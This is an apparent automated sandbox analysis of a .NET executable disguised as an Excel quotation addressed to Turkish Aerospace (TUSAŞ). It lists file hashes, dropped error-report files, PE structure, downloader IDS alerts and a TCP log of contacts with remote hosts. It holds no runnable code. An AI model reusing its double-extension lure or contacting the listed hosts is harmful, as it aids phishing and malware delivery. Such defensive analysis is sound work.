File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8864
Entropy (8bit):	3.7333666188975396
Encrypted:	false
SSDEEP:	192:R6l7wVeJxSAAeg6YSTmhfVWGgmfnIM1pr/89bxakfzbm:R6lXJiZ6YGmhdgmfIMIxhfe
MD5:	6034689AC0B56C93A3E73A901B394D02
SHA1:	E61C8BD09B09DB131C318532E39A9F4B0D2E572E
SHA-256:	FFB2EF4D89BAF2CFDADC987A12A6111235ADE08F350722416F75D7F246298416
SHA-512:	3392FEC2127C2DE205E22C1FBD5E581D09FE8A3F7F9124EB09DC791B2340B6776ED02BE78D638F68BB00F38F6329B222DFDB0BE1577D31A7B72AFED7E02F7AA8
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.4.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8F70.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	5077
Entropy (8bit):	4.67587328950869
Encrypted:	false
SSDEEP:	48:cvIwWl8zs3Jg771I9oLWpW8VYvYm8M4JmQFXYjyq85v8ErDSzQvpaDSHd:uIjfZI7T67VXJyjxErez/eHd
MD5:	043E923084BC68FF11F1A9B5FBCDF748
SHA1:	91AED1CD042767C40EBBC929E10B4C643C6F20BA
SHA-256:	C9B29B0F5E355D685968AEE48A2667559BB4A7FC1E51FCDBBB54CDC3EE25CD95
SHA-512:	18C84E35C525438B953F3BB5488DFB16513EC15E3BE75CD74B7AA0E655135955CEBA0C1E0F58806ACD9D7153C7C05731C2EDDFE48F8D1A5C078A6822387E8D49
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="629750" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.372977195389786
Encrypted:	false
SSDEEP:	6144:pFVfpi6ceLP/9skLmb04yWWSPtaJG8nAge35OlMMhA2AX4WABlguNjiL5e:/V1myWWI/glMM6kF7Jq5e
MD5:	8BF94499A92D28AD9A0FAEE01E1134C9
SHA1:	A89781E0C046FAAF5946FE3D057630D4580DE9F7
SHA-256:	8FC0E91D6C48B0849486CB46FBBA7974F6EFEB120BA6FE23D6A70BFFDA0CFF65
SHA-512:	B747116B442DE6C3F3FEC584EC6D11238D58B62788CB8AA6456F3581F1D186549559D8A54F6FE57AB73417E6EB1B90F9C46D4E337F01A356E0667B9B806C15AF
Malicious:	false
Reputation:	low
Preview:	regfC...C....\.Z.................... ....0......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.@{.~M..............................................................................................................................................................................................................................................................................................................................................bWl.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.9937371823848915
TrID:	Win64 Executable Console Net Framework (206006/5) 48.58% Win64 Executable Console (202006/5) 47.64% Win64 Executable (generic) (12005/4) 2.83% Generic Win/DOS Executable (2004/3) 0.47% DOS Executable Generic (2002/1) 0.47%
File name:	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe
File size:	638'976 bytes
MD5:	037b9dc9d5bee07e111173cbe87624b4
SHA1:	881d8ba41c222c0ff9ee96dab3e954417da6c34f
SHA256:	3f9ac29a06c3a7145971c352ecc386b94dc13be8b479d09c920f36e20f6b1b41
SHA512:	5fc5c3794ff87db5d13e2b93c5805f4b17c23aff7d4f348a7634206f88d3814f479d9a73a157e8f01823facf5e70dea831a8725d45171b5e1164397ce2a08433
SSDEEP:	12288:OPbTRt0NTO1JKbMDrZrVW+RLV//TSrSv9GDa0YN7vuAwmqG8kL:ybTniTOHmWr5Uq+rSoEduAwmNx
TLSH:	3AD42380D7486A69DC3D3BB9EA279CFA1C4CFE6258A369778D107D620D745C431A2CB3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...!.[g.........."...0..0............... ....@...... ..............................-.....`................................

File Icon


Icon Hash:	4f81888c8c89874f

Static PE Info

General

Entrypoint:	0x400000
Entrypoint Section:
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x675B9D21 [Fri Dec 13 02:34:09 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:

Entrypoint Preview

Instruction
dec ebp
pop edx
nop
add byte ptr [ebx], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x6000	0x98b82	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2000	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x30a2	0x3200	7b158ee8bdf0227222a608ae1c80f1ab	False	0.612734375	data	6.139186529436959	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x6000	0x98b82	0x98c00	4be3baa6debe71ed51148f0f564660ad	False	0.9942077536824877	data	7.998256605720663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
OMNIPOTENTMALWARE	0x63c0	0x97010	data	1.0003168895672194
OMNIPOTENTMALWARE	0x9d3d0	0x180	data	1.0286458333333333
OMNIPOTENTMALWARE	0x9d550	0x20	data	1.28125
OMNIPOTENTMALWARE	0x9d570	0x10	data	1.5625
OMNIPOTENTMALWARE	0x9d580	0x10	data	1.5
OMNIPOTENTMALWARE	0x9d590	0x10	data	1.5
RT_ICON	0x9d5a0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m	0.37406191369606
RT_GROUP_ICON	0x9e648	0x14	data	1.1
RT_VERSION	0x9e65c	0x33c	data	0.42391304347826086
RT_MANIFEST	0x9e998	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-13T17:47:30.501678+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49704	132.226.8.169	80	TCP
2024-12-13T17:47:33.251737+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49704	132.226.8.169	80	TCP
2024-12-13T17:47:34.911215+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49709	104.21.67.152	443	TCP
2024-12-13T17:47:36.517401+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49711	132.226.8.169	80	TCP
2024-12-13T17:47:38.152950+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49713	104.21.67.152	443	TCP
2024-12-13T17:47:41.414563+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49717	104.21.67.152	443	TCP
2024-12-13T17:47:44.687718+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49719	104.21.67.152	443	TCP
2024-12-13T17:47:57.776310+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49727	104.21.67.152	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 13, 2024 17:47:28.206691027 CET	49704	80	192.168.2.8	132.226.8.169
Dec 13, 2024 17:47:28.326636076 CET	80	49704	132.226.8.169	192.168.2.8
Dec 13, 2024 17:47:28.326731920 CET	49704	80	192.168.2.8	132.226.8.169
Dec 13, 2024 17:47:28.336915016 CET	49704	80	192.168.2.8	132.226.8.169
Dec 13, 2024 17:47:28.456644058 CET	80	49704	132.226.8.169	192.168.2.8
Dec 13, 2024 17:47:29.932717085 CET	80	49704	132.226.8.169	192.168.2.8
Dec 13, 2024 17:47:29.941494942 CET	49704	80	192.168.2.8	132.226.8.169
Dec 13, 2024 17:47:30.063574076 CET	80	49704	132.226.8.169	192.168.2.8
Dec 13, 2024 17:47:30.448084116 CET	80	49704	132.226.8.169	192.168.2.8
Dec 13, 2024 17:47:30.501677990 CET	49704	80	192.168.2.8	132.226.8.169
Dec 13, 2024 17:47:30.999337912 CET	49706	443	192.168.2.8	104.21.67.152
Dec 13, 2024 17:47:30.999403000 CET	443	49706	104.21.67.152	192.168.2.8
Dec 13, 2024 17:47:31.001262903 CET	49706	443	192.168.2.8	104.21.67.152
Dec 13, 2024 17:47:31.016493082 CET	49706	443	192.168.2.8	104.21.67.152
Dec 13, 2024 17:47:31.016527891 CET	443	49706	104.21.67.152	192.168.2.8
Dec 13, 2024 17:47:32.252230883 CET	443	49706	104.21.67.152	192.168.2.8
Dec 13, 2024 17:47:32.252370119 CET	49706	443	192.168.2.8	104.21.67.152
Dec 13, 2024 17:47:32.256717920 CET	49706	443	192.168.2.8	104.21.67.152
Dec 13, 2024 17:47:32.256735086 CET	443	49706	104.21.67.152	192.168.2.8
Dec 13, 2024 17:47:32.257026911 CET	443	49706	104.21.67.152	192.168.2.8
Dec 13, 2024 17:47:32.298578978 CET	49706	443	192.168.2.8	104.21.67.152
Dec 13, 2024 17:47:32.307024002 CET	49706	443	192.168.2.8	104.21.67.152
Dec 13, 2024 17:47:32.347337961 CET	443	49706	104.21.67.152	192.168.2.8
Dec 13, 2024 17:47:32.705193996 CET	443	49706	104.21.67.152	192.168.2.8
Dec 13, 2024 17:47:32.705346107 CET	443	49706	104.21.67.152	192.168.2.8
Dec 13, 2024 17:47:32.705482960 CET	49706	443	192.168.2.8	104.21.67.152
Dec 13, 2024 17:47:32.711642981 CET	49706	443	192.168.2.8	104.21.67.152
Dec 13, 2024 17:47:32.715142965 CET	49704	80	192.168.2.8	132.226.8.169
Dec 13, 2024 17:47:32.838670015 CET	80	49704	132.226.8.169	192.168.2.8
Dec 13, 2024 17:47:33.210464954 CET	80	49704	132.226.8.169	192.168.2.8
Dec 13, 2024 17:47:33.212512016 CET	49709	443	192.168.2.8	104.21.67.152
Dec 13, 2024 17:47:33.212579966 CET	443	49709	104.21.67.152	192.168.2.8
Dec 13, 2024 17:47:33.212683916 CET	49709	443	192.168.2.8	104.21.67.152
Dec 13, 2024 17:47:33.212985992 CET	49709	443	192.168.2.8	104.21.67.152
Dec 13, 2024 17:47:33.213005066 CET	443	49709	104.21.67.152	192.168.2.8
Dec 13, 2024 17:47:33.251737118 CET	49704	80	192.168.2.8	132.226.8.169
Dec 13, 2024 17:47:34.460902929 CET	443	49709	104.21.67.152	192.168.2.8
Dec 13, 2024 17:47:34.469963074 CET	49709	443	192.168.2.8	104.21.67.152
Dec 13, 2024 17:47:34.470005035 CET	443	49709	104.21.67.152	192.168.2.8
Dec 13, 2024 17:47:34.911250114 CET	443	49709	104.21.67.152	192.168.2.8
Dec 13, 2024 17:47:34.911339045 CET	443	49709	104.21.67.152	192.168.2.8
Dec 13, 2024 17:47:34.911406040 CET	49709	443	192.168.2.8	104.21.67.152
Dec 13, 2024 17:47:34.911906004 CET	49709	443	192.168.2.8	104.21.67.152
Dec 13, 2024 17:47:34.915183067 CET	49704	80	192.168.2.8	132.226.8.169
Dec 13, 2024 17:47:34.916273117 CET	49711	80	192.168.2.8	132.226.8.169
Dec 13, 2024 17:47:35.035614014 CET	80	49704	132.226.8.169	192.168.2.8
Dec 13, 2024 17:47:35.036294937 CET	49704	80	192.168.2.8	132.226.8.169
Dec 13, 2024 17:47:35.036309958 CET	80	49711	132.226.8.169	192.168.2.8
Dec 13, 2024 17:47:35.036549091 CET	49711	80	192.168.2.8	132.226.8.169
Dec 13, 2024 17:47:35.036549091 CET	49711	80	192.168.2.8	132.226.8.169
Dec 13, 2024 17:47:35.157344103 CET	80	49711	132.226.8.169	192.168.2.8
Dec 13, 2024 17:47:36.468311071 CET	80	49711	132.226.8.169	192.168.2.8
Dec 13, 2024 17:47:36.469763994 CET	49713	443	192.168.2.8	104.21.67.152
Dec 13, 2024 17:47:36.469799995 CET	443	49713	104.21.67.152	192.168.2.8
Dec 13, 2024 17:47:36.469871044 CET	49713	443	192.168.2.8	104.21.67.152
Dec 13, 2024 17:47:36.470411062 CET	49713	443	192.168.2.8	104.21.67.152
Dec 13, 2024 17:47:36.470427990 CET	443	49713	104.21.67.152	192.168.2.8
Dec 13, 2024 17:47:36.517400980 CET	49711	80	192.168.2.8	132.226.8.169
Dec 13, 2024 17:47:37.688591003 CET	443	49713	104.21.67.152	192.168.2.8
Dec 13, 2024 17:47:37.699980021 CET	49713	443	192.168.2.8	104.21.67.152
Dec 13, 2024 17:47:37.699999094 CET	443	49713	104.21.67.152	192.168.2.8
Dec 13, 2024 17:47:38.152842045 CET	443	49713	104.21.67.152	192.168.2.8
Dec 13, 2024 17:47:38.152906895 CET	443	49713	104.21.67.152	192.168.2.8
Dec 13, 2024 17:47:38.152992964 CET	49713	443	192.168.2.8	104.21.67.152
Dec 13, 2024 17:47:38.153451920 CET	49713	443	192.168.2.8	104.21.67.152
Dec 13, 2024 17:47:38.158612013 CET	49715	80	192.168.2.8	132.226.8.169
Dec 13, 2024 17:47:38.283354998 CET	80	49715	132.226.8.169	192.168.2.8
Dec 13, 2024 17:47:38.283648968 CET	49715	80	192.168.2.8	132.226.8.169
Dec 13, 2024 17:47:38.283648968 CET	49715	80	192.168.2.8	132.226.8.169
Dec 13, 2024 17:47:38.403588057 CET	80	49715	132.226.8.169	192.168.2.8
Dec 13, 2024 17:47:39.726651907 CET	80	49715	132.226.8.169	192.168.2.8
Dec 13, 2024 17:47:39.728033066 CET	49717	443	192.168.2.8	104.21.67.152
Dec 13, 2024 17:47:39.728065014 CET	443	49717	104.21.67.152	192.168.2.8
Dec 13, 2024 17:47:39.728136063 CET	49717	443	192.168.2.8	104.21.67.152
Dec 13, 2024 17:47:39.728534937 CET	49717	443	192.168.2.8	104.21.67.152
Dec 13, 2024 17:47:39.728545904 CET	443	49717	104.21.67.152	192.168.2.8
Dec 13, 2024 17:47:39.767328024 CET	49715	80	192.168.2.8	132.226.8.169
Dec 13, 2024 17:47:40.941395998 CET	443	49717	104.21.67.152	192.168.2.8
Dec 13, 2024 17:47:40.951236963 CET	49717	443	192.168.2.8	104.21.67.152
Dec 13, 2024 17:47:40.951265097 CET	443	49717	104.21.67.152	192.168.2.8
Dec 13, 2024 17:47:41.414398909 CET	443	49717	104.21.67.152	192.168.2.8
Dec 13, 2024 17:47:41.414468050 CET	443	49717	104.21.67.152	192.168.2.8
Dec 13, 2024 17:47:41.414622068 CET	49717	443	192.168.2.8	104.21.67.152
Dec 13, 2024 17:47:41.415280104 CET	49717	443	192.168.2.8	104.21.67.152
Dec 13, 2024 17:47:41.462723970 CET	49715	80	192.168.2.8	132.226.8.169
Dec 13, 2024 17:47:41.463733912 CET	49718	80	192.168.2.8	132.226.8.169
Dec 13, 2024 17:47:41.583022118 CET	80	49715	132.226.8.169	192.168.2.8
Dec 13, 2024 17:47:41.583117008 CET	49715	80	192.168.2.8	132.226.8.169
Dec 13, 2024 17:47:41.583529949 CET	80	49718	132.226.8.169	192.168.2.8
Dec 13, 2024 17:47:41.583589077 CET	49718	80	192.168.2.8	132.226.8.169
Dec 13, 2024 17:47:41.583791018 CET	49718	80	192.168.2.8	132.226.8.169
Dec 13, 2024 17:47:41.703773022 CET	80	49718	132.226.8.169	192.168.2.8
Dec 13, 2024 17:47:43.017601013 CET	80	49718	132.226.8.169	192.168.2.8
Dec 13, 2024 17:47:43.018892050 CET	49719	443	192.168.2.8	104.21.67.152
Dec 13, 2024 17:47:43.018946886 CET	443	49719	104.21.67.152	192.168.2.8
Dec 13, 2024 17:47:43.019028902 CET	49719	443	192.168.2.8	104.21.67.152
Dec 13, 2024 17:47:43.019336939 CET	49719	443	192.168.2.8	104.21.67.152
Dec 13, 2024 17:47:43.019347906 CET	443	49719	104.21.67.152	192.168.2.8
Dec 13, 2024 17:47:43.064189911 CET	49718	80	192.168.2.8	132.226.8.169
Dec 13, 2024 17:47:44.233232975 CET	443	49719	104.21.67.152	192.168.2.8
Dec 13, 2024 17:47:44.235752106 CET	49719	443	192.168.2.8	104.21.67.152
Dec 13, 2024 17:47:44.235775948 CET	443	49719	104.21.67.152	192.168.2.8
Dec 13, 2024 17:47:44.687702894 CET	443	49719	104.21.67.152	192.168.2.8
Dec 13, 2024 17:47:44.687988997 CET	443	49719	104.21.67.152	192.168.2.8
Dec 13, 2024 17:47:44.688040018 CET	49719	443	192.168.2.8	104.21.67.152
Dec 13, 2024 17:47:44.691205025 CET	49719	443	192.168.2.8	104.21.67.152
Dec 13, 2024 17:47:44.812650919 CET	49718	80	192.168.2.8	132.226.8.169
Dec 13, 2024 17:47:44.817539930 CET	49720	80	192.168.2.8	132.226.8.169
Dec 13, 2024 17:47:44.936925888 CET	80	49718	132.226.8.169	192.168.2.8
Dec 13, 2024 17:47:44.937005043 CET	49718	80	192.168.2.8	132.226.8.169
Dec 13, 2024 17:47:44.941685915 CET	80	49720	132.226.8.169	192.168.2.8
Dec 13, 2024 17:47:44.941806078 CET	49720	80	192.168.2.8	132.226.8.169
Dec 13, 2024 17:47:44.943222046 CET	49720	80	192.168.2.8	132.226.8.169
Dec 13, 2024 17:47:45.064048052 CET	80	49720	132.226.8.169	192.168.2.8
Dec 13, 2024 17:47:46.364022970 CET	80	49720	132.226.8.169	192.168.2.8
Dec 13, 2024 17:47:46.365447998 CET	49721	443	192.168.2.8	104.21.67.152
Dec 13, 2024 17:47:46.365502119 CET	443	49721	104.21.67.152	192.168.2.8
Dec 13, 2024 17:47:46.365595102 CET	49721	443	192.168.2.8	104.21.67.152
Dec 13, 2024 17:47:46.365856886 CET	49721	443	192.168.2.8	104.21.67.152
Dec 13, 2024 17:47:46.365892887 CET	443	49721	104.21.67.152	192.168.2.8
Dec 13, 2024 17:47:46.408124924 CET	49720	80	192.168.2.8	132.226.8.169
Dec 13, 2024 17:47:47.585923910 CET	443	49721	104.21.67.152	192.168.2.8
Dec 13, 2024 17:47:47.626740932 CET	49721	443	192.168.2.8	104.21.67.152
Dec 13, 2024 17:47:47.660648108 CET	49721	443	192.168.2.8	104.21.67.152
Dec 13, 2024 17:47:47.660711050 CET	443	49721	104.21.67.152	192.168.2.8
Dec 13, 2024 17:47:48.037079096 CET	443	49721	104.21.67.152	192.168.2.8
Dec 13, 2024 17:47:48.037147045 CET	443	49721	104.21.67.152	192.168.2.8
Dec 13, 2024 17:47:48.037213087 CET	49721	443	192.168.2.8	104.21.67.152
Dec 13, 2024 17:47:48.037623882 CET	49721	443	192.168.2.8	104.21.67.152
Dec 13, 2024 17:47:48.041302919 CET	49720	80	192.168.2.8	132.226.8.169
Dec 13, 2024 17:47:48.042845964 CET	49722	80	192.168.2.8	132.226.8.169
Dec 13, 2024 17:47:48.162763119 CET	80	49720	132.226.8.169	192.168.2.8
Dec 13, 2024 17:47:48.162857056 CET	49720	80	192.168.2.8	132.226.8.169
Dec 13, 2024 17:47:48.163891077 CET	80	49722	132.226.8.169	192.168.2.8
Dec 13, 2024 17:47:48.163984060 CET	49722	80	192.168.2.8	132.226.8.169
Dec 13, 2024 17:47:48.164143085 CET	49722	80	192.168.2.8	132.226.8.169
Dec 13, 2024 17:47:48.284506083 CET	80	49722	132.226.8.169	192.168.2.8
Dec 13, 2024 17:47:49.614218950 CET	80	49722	132.226.8.169	192.168.2.8
Dec 13, 2024 17:47:49.615935087 CET	49723	443	192.168.2.8	104.21.67.152
Dec 13, 2024 17:47:49.616000891 CET	443	49723	104.21.67.152	192.168.2.8
Dec 13, 2024 17:47:49.616096973 CET	49723	443	192.168.2.8	104.21.67.152
Dec 13, 2024 17:47:49.616410017 CET	49723	443	192.168.2.8	104.21.67.152
Dec 13, 2024 17:47:49.616430044 CET	443	49723	104.21.67.152	192.168.2.8
Dec 13, 2024 17:47:49.658041000 CET	49722	80	192.168.2.8	132.226.8.169
Dec 13, 2024 17:47:50.834312916 CET	443	49723	104.21.67.152	192.168.2.8
Dec 13, 2024 17:47:50.836183071 CET	49723	443	192.168.2.8	104.21.67.152
Dec 13, 2024 17:47:50.836288929 CET	443	49723	104.21.67.152	192.168.2.8
Dec 13, 2024 17:47:51.283843994 CET	443	49723	104.21.67.152	192.168.2.8
Dec 13, 2024 17:47:51.283915043 CET	443	49723	104.21.67.152	192.168.2.8
Dec 13, 2024 17:47:51.283970118 CET	49723	443	192.168.2.8	104.21.67.152
Dec 13, 2024 17:47:51.284375906 CET	49723	443	192.168.2.8	104.21.67.152
Dec 13, 2024 17:47:51.292916059 CET	49722	80	192.168.2.8	132.226.8.169
Dec 13, 2024 17:47:51.293857098 CET	49724	80	192.168.2.8	132.226.8.169
Dec 13, 2024 17:47:51.415986061 CET	80	49722	132.226.8.169	192.168.2.8
Dec 13, 2024 17:47:51.416230917 CET	49722	80	192.168.2.8	132.226.8.169
Dec 13, 2024 17:47:51.416379929 CET	80	49724	132.226.8.169	192.168.2.8
Dec 13, 2024 17:47:51.416460037 CET	49724	80	192.168.2.8	132.226.8.169
Dec 13, 2024 17:47:51.416651964 CET	49724	80	192.168.2.8	132.226.8.169
Dec 13, 2024 17:47:51.537676096 CET	80	49724	132.226.8.169	192.168.2.8
Dec 13, 2024 17:47:52.837898016 CET	80	49724	132.226.8.169	192.168.2.8
Dec 13, 2024 17:47:52.839610100 CET	49725	443	192.168.2.8	104.21.67.152
Dec 13, 2024 17:47:52.839665890 CET	443	49725	104.21.67.152	192.168.2.8
Dec 13, 2024 17:47:52.839785099 CET	49725	443	192.168.2.8	104.21.67.152
Dec 13, 2024 17:47:52.840054989 CET	49725	443	192.168.2.8	104.21.67.152
Dec 13, 2024 17:47:52.840069056 CET	443	49725	104.21.67.152	192.168.2.8
Dec 13, 2024 17:47:52.892339945 CET	49724	80	192.168.2.8	132.226.8.169
Dec 13, 2024 17:47:54.090388060 CET	443	49725	104.21.67.152	192.168.2.8
Dec 13, 2024 17:47:54.094508886 CET	49725	443	192.168.2.8	104.21.67.152
Dec 13, 2024 17:47:54.094536066 CET	443	49725	104.21.67.152	192.168.2.8
Dec 13, 2024 17:47:54.538934946 CET	443	49725	104.21.67.152	192.168.2.8
Dec 13, 2024 17:47:54.539009094 CET	443	49725	104.21.67.152	192.168.2.8
Dec 13, 2024 17:47:54.539093971 CET	49725	443	192.168.2.8	104.21.67.152
Dec 13, 2024 17:47:54.539565086 CET	49725	443	192.168.2.8	104.21.67.152
Dec 13, 2024 17:47:54.542335033 CET	49724	80	192.168.2.8	132.226.8.169
Dec 13, 2024 17:47:54.543332100 CET	49726	80	192.168.2.8	132.226.8.169
Dec 13, 2024 17:47:54.663305998 CET	80	49724	132.226.8.169	192.168.2.8
Dec 13, 2024 17:47:54.663376093 CET	49724	80	192.168.2.8	132.226.8.169
Dec 13, 2024 17:47:54.663588047 CET	80	49726	132.226.8.169	192.168.2.8
Dec 13, 2024 17:47:54.663680077 CET	49726	80	192.168.2.8	132.226.8.169
Dec 13, 2024 17:47:54.663825035 CET	49726	80	192.168.2.8	132.226.8.169
Dec 13, 2024 17:47:54.783483982 CET	80	49726	132.226.8.169	192.168.2.8
Dec 13, 2024 17:47:56.104537964 CET	80	49726	132.226.8.169	192.168.2.8
Dec 13, 2024 17:47:56.106992960 CET	49727	443	192.168.2.8	104.21.67.152
Dec 13, 2024 17:47:56.107040882 CET	443	49727	104.21.67.152	192.168.2.8
Dec 13, 2024 17:47:56.107099056 CET	49727	443	192.168.2.8	104.21.67.152
Dec 13, 2024 17:47:56.107362986 CET	49727	443	192.168.2.8	104.21.67.152
Dec 13, 2024 17:47:56.107377052 CET	443	49727	104.21.67.152	192.168.2.8
Dec 13, 2024 17:47:56.158015966 CET	49726	80	192.168.2.8	132.226.8.169
Dec 13, 2024 17:47:57.322609901 CET	443	49727	104.21.67.152	192.168.2.8
Dec 13, 2024 17:47:57.324115992 CET	49727	443	192.168.2.8	104.21.67.152
Dec 13, 2024 17:47:57.324141026 CET	443	49727	104.21.67.152	192.168.2.8
Dec 13, 2024 17:47:57.776118040 CET	443	49727	104.21.67.152	192.168.2.8
Dec 13, 2024 17:47:57.776185989 CET	443	49727	104.21.67.152	192.168.2.8
Dec 13, 2024 17:47:57.776263952 CET	49727	443	192.168.2.8	104.21.67.152
Dec 13, 2024 17:47:57.776848078 CET	49727	443	192.168.2.8	104.21.67.152
Dec 13, 2024 17:47:57.792398930 CET	49726	80	192.168.2.8	132.226.8.169
Dec 13, 2024 17:47:57.912642956 CET	80	49726	132.226.8.169	192.168.2.8
Dec 13, 2024 17:47:57.912734985 CET	49726	80	192.168.2.8	132.226.8.169
Dec 13, 2024 17:47:57.932050943 CET	49728	443	192.168.2.8	149.154.167.220
Dec 13, 2024 17:47:57.932120085 CET	443	49728	149.154.167.220	192.168.2.8
Dec 13, 2024 17:47:57.932241917 CET	49728	443	192.168.2.8	149.154.167.220
Dec 13, 2024 17:47:57.932694912 CET	49728	443	192.168.2.8	149.154.167.220
Dec 13, 2024 17:47:57.932710886 CET	443	49728	149.154.167.220	192.168.2.8
Dec 13, 2024 17:47:59.310399055 CET	443	49728	149.154.167.220	192.168.2.8
Dec 13, 2024 17:47:59.310604095 CET	49728	443	192.168.2.8	149.154.167.220
Dec 13, 2024 17:47:59.312789917 CET	49728	443	192.168.2.8	149.154.167.220
